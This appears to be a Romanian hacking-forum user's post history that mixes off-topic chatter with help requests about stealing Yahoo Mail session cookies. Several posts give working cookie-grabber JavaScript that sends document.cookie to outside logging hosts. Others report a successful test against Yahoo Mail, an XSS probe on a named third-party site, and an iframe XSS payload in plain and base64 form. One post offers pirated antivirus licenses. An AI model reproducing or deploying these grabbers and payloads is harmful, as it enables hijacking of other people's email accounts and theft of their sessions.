i0nu7z
-
Posts
23 -
Joined
-
Last visited
Posts posted by i0nu7z
-
-
Inutil sa spun ca pentru un user obisnuit e destul de greu sa isi dea seama cum s-a inserat codul.
incearca-ma
-
ce scapa nefiltrat? :shock: unde?!
adica are legatura cu veriunea aia chinezeasca de yahoo?
presupun ca nu dai informatii vitale si mi se pare normal ... dar asa niste chestii vagi poti sa divulgi?! daca nu , oricum scuza-mi indrazneala de a intreba
-
etnoplant.ro
ma intreb ca orice muritor de rand... e legala toata treaba aia? cu imagini de genul asta pe index..
OFF-topic: la primul link e xss in CAUTARE
"<script>alert(document.cookie)</script> -
nu stiu cat ajuta sau daca ajuta la ceva dar am observat ca daca folosesc
<iframe src=http://ha.ckers.org/scriptlet.html <
respectiv
PGlmcmFtZSBzcmM9aHR0cDovL2hhLmNrZXJzLm9yZy9zY3JpcHRsZXQuaHRtbCA8
xss-ul ruleaza doar odata si parca....parca mi se pare mie ca incarca putin mai rapid.. voua cum vi se pare?
Later Edit: pe explorer tot de 2 ori ruleaza...
-
uite aici niste licente ptr K.I.S. v7.0.1.321
-
referitor la acest xss
nu reusesc sa il fac sa imi dea alert la document.cookie ... daca il pun intre apostrof ' ' sau " " nu apare decat mesajul document.cookie plaintext as is. daca dau remove la apostof nothing happens.
ce zicea moubik mai sus probabil se referea la plusul de la linkul malitios
location.href = "http://site.com/logger.php?123456"+document.cookie
Dar eu nu reusesc nici macar sa`mi alertez propriul cookie... cineva sa`mi dea o palma ca sa ma indrept spre solutia corecta.
Daca alt xss n`avem macar sa`l reusesc si eu pe asta..
Thanks in advance
-
-
http://www.youtube.com/watch?v=Dw1oj2zhgJg
techno-ul de la final e chiar marfa
-
mars ba la papusi !
-
ma baeti mah,
eu n-am inteles ce vreti voi sa ziceti cu function init() ala ..cum adica nu mai merge?!
Deci eu folosesc graberul vechi cu javascriptu asta:
function init() { new Image().src='http://www.site.com/sdsphp?cookie='+escape(document.cookie); } window.onload=init; si grabberul lui kwerln
si merge struna... pe toate tipurile de browsere IE6, IE7 , Opera 9.2 , Firefox ultima versiune..inclusiv pe mail beta cat si pe versiunea veche de yahoo.
Acum am schimbat grabberul ... l`am pus pe cel nou si merge la fel de bine!
rezultatele sunt chiar spectaculoase!
In finalul acestui post tin sa mentionez urmatoarele:
multumiri lui Bankai, Nemessis, kw3rln, slick, si toti cei care au contribuit la automatizarea grabberului. Mi-ati dat idei ... acum lucrez si eu la o versiune a mea .. sper sa imi reuseasca ... ptr ca as dorii sa adaug si eu cateva chestii..
Mult noroc staff-ului RST si spor in toate proiectele voastre
....am plecat sa ard un Pall Mall ... ciao
-
pai si atunci de ce trebuie sa se simta si ficatu lui bine?!
-
e reclama la Chevrolet
-
un raspuns scurt .. si la obiect. exact ce-mi trebuia!
mersi frumos SharinGod :wink:
EDIT:
Finally done!
combinând graberul lui kw3rln cu javascriptul lui nemessisrezultatele au fost exceptionale!
it works like a bitch!!
mii de multumiri nemessis, kw3rln, si nu in ultimul rand comnunitatii RST!
-
frate nu trebuie sa te enervezi ca m-ai vazut mai incepator si sa ma trimiti la teme! am intrebat si eu ca omu' ce e bine si ce nu !
normal ca poate tie se pare banal si ti-a sarit din prima in ochi greseala care o fac.. eu facusem aici o cerere de ajutor, daca vrei sa ajuti bine ..daca nu lasa-ma sa-mi maninc singur ficatii.
stiu notiunea de baza a unui cookie si am urmarit tutorialul video al lui nemessis pina mi s-a imbibat crystal playeru` pe retina! am o cârca de draci pe tema asta si nimeni nu zice in ce directie ar trebuii sa ma indrept.
mersi oricum ptr .. sfat!
-
da mai shamat .. EXACT asa am facut ... in loc de 123 am pus i0nu7z ...
Dar cand incercam sa-mi exprim aici durerea am vorbit la modul general si am zis "user" nah ... a fost o mica neintelegere acolo!
the point is ..ca la mine nu merge !
sa explic putin cum a procedat pina aici , poate identifica cineva si ptr mine unde e beleaua!
deci ..mai intai de toate am luat hostul pe ifastnet[dot]com
am luat graberul lui kw3rln pe care l-am numit viermi.php
am mai creat inca un fisier TXT care l-am numit tot viermi.txt si le-am uploadat pe ambele intr-un folder de pe host!
Intr-un mail de yahoo .. am trimis ca test mesajul:
"da click aici : http://www.host.ifastnet.com/folder/viermi.php?cookie='+document.cookie;
"
[mentionez urmatoarele: versiunea veche yahoo + IE6]
cand intru si dau click ...in fisierul text nu`mi apare decat IP-ul!
am zis frate .. ceva nu e bine ..nu o fii bun grabberul ..desi daca imi da totusi ipu inseamna ca totusi merge..
so .. am trecut la a doua varianta si anume javascriptul
function init() { new Image().src='http://rstzone.net/index.php?pagina=cookie_logger&user=i0nu7z&logheaza='+escape(document.cookie); } window.onload=init;
rezultatele au fost la fel de impresionanate! deci ... unde e buba?!!!?!?!?!?!
respect vesnic ptr cel care ma ajuta sa-l duc totusi la bun sfarsit!
cine vrea sa dea un help poate sa dea si PM!
-
asta e numa grabberu ma! mai trebe sa ai xss-u in yahoo si sa faci un mic js
un lil' help cu js-ul ala mic ptr cei mai putin indemanatici se poate?!
am incercat asa ceva ... brandul nemessis!
si nu imi merge sau ceva fac eu eronat
function init() { new Image().src='http://rstzone.net/index.php?pagina=cookie_logger&user=user&logheaza='+escape(document.cookie); } window.onload=init;
am incercat si pus pe alt host alt js..
zeceti fratilor un hint acolo ca ma agat de lustra de nervi..
-
cauti pe la bunicu' un radio däla vechi ..sau dintr-un tv pe lampi un tranzistor BC107 sau BC109 (sau orice alt tranzisor ce seamana cu ala, respectiv invelisul acela metalic)..se gasesc pe toate santurile dracu.
BC107 parca era si in schema de la "bistabilul" lui nos ptr dacia lui...desi eu retin ca circuitul se numeste "a-stabil" (cel bistabil parca era ptr circuitu ala cu mai multe leduri ce formau o lumina curgatoare.... parca!!!)
cu mare dibacie ii dai remove la partea de sus a tranzistoruui cu o pinza de bomfaier sau traforaj (depinde ce gasesti peacas la indemana) si esti gata, il legi la circuit si daca ii bagi o lumina pe "gât" prin orificiul creat iti da o mica tensiune care poate alimenta un LED. Nu mai retin pe care din pini (emitor, colector sau baza). pana mea ...vezi si tu
sa nu te bagi la alea cu germaniu ca alea contin o pasta termoconductoare si ramane spoita celula aia care e sensibila la lumina!
hai noroc
-
va sa zica nimeni pe aici nu poarta freze dealea "standard" cu foarte scurt pe lateral (eventual cu chicä foarte evidentiata) si modele g-a-y datorate oxigenari?
Inseamna ca sunteti niste chifle out of trend ...ca sa zic asa.
Deci .. cei care cunosc nu pot confunda denumirea de "sheptar" !!!
Neaparat, repet NEAPARAT cu tricou roz mulat pe care trebe frate scris ITALIA continuând cu blugi cu multe briz-brizuri si adidasi mimin 3 milioane jumate...
La asa tinuta "gangsta" esti numai bun de plimbat prin MALL impreuna cu baetii la care te duci evident cu bemveu' , mertu sau in cel mai naspa caz cu vectra lu' "al batrân", inmatriculat cu BOS, VIP, FBI, VIS, LOV, SEF, etc. Maneaua rasuna parca primejdios ptr 'vrajmasii' care tre sa te auda de la 3 cartiere distanta de parca ai fii inginer de sunet... semn ca e belea mare si tre sa se tireze .
Zbeng .... sa ne traiesti tata!
-
frate ... mie nu imi pune in viermi.txt decat ip-ul victimei .... unde gresesc>?
la Y=
si T= ............... nimic :shock: what the f@*k?
Am csrf in Yahoo
in Off-topic
Posted
pai si mai conteaza ca e csrf sau permanent?! .. impactul e oarecum asemanator . asta e important !
bravo din partea lui ca l-a gasit ... acum mi-am dat seama de mai multe. eu credeam ca este vorba de un baypass care trecea nevazut de cel care isi citea mailu si ii se executa in background xss-ul.
despre ce serviciu e vorba nu mai are rost sa intreb ca as da dovada de tupeu si chias mi-as merita pocneala de rigoare
anyway misto ..